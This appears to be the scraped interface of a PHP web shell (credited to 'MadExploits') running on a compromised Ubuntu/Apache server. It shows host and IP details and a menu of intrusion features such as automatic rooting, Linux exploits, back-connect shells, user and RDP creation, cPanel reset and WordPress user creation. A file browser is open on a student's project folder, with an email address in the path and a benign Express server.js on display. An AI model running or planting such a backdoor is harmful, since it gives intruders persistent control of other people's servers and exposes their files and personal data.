Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gautam22188@iiitd.edu.in /
IMS /
backend /
[ HOME SHELL ]
Name
Size
Permission
Action
backend
[ DIR ]
drwxr-xr-x
controllers
[ DIR ]
drwxr-xr-x
frontend
[ DIR ]
drwxr-xr-x
middleware
[ DIR ]
drwxr-xr-x
prisma
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
.env.example
332
B
-rw-r--r--
package-lock.json
55.39
KB
-rw-r--r--
package.json
791
B
-rw-r--r--
server.js
877
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server.js
require('dotenv').config(); const express = require('express'); const cors = require('cors'); const app = express(); const PORT = process.env.PORT || 5000; // Middleware app.use(cors()); app.use(express.json()); app.use(express.urlencoded({ extended: true })); // Routes const authRoutes = require('./routes/authRoutes'); const dashboardRoutes = require('./routes/dashboardRoutes'); app.use('/api/auth', authRoutes); app.use('/api/dashboard', dashboardRoutes); // Health check app.get('/api/health', (req, res) => { res.json({ status: 'ok', message: 'IMS Backend is running' }); }); // Error handler app.use((err, req, res, next) => { console.error(err.stack); res.status(err.status || 500).json({ error: { message: err.message || 'Internal Server Error', }, }); }); app.listen(PORT, () => { console.log(`Server is running on port ${PORT}`); });
Close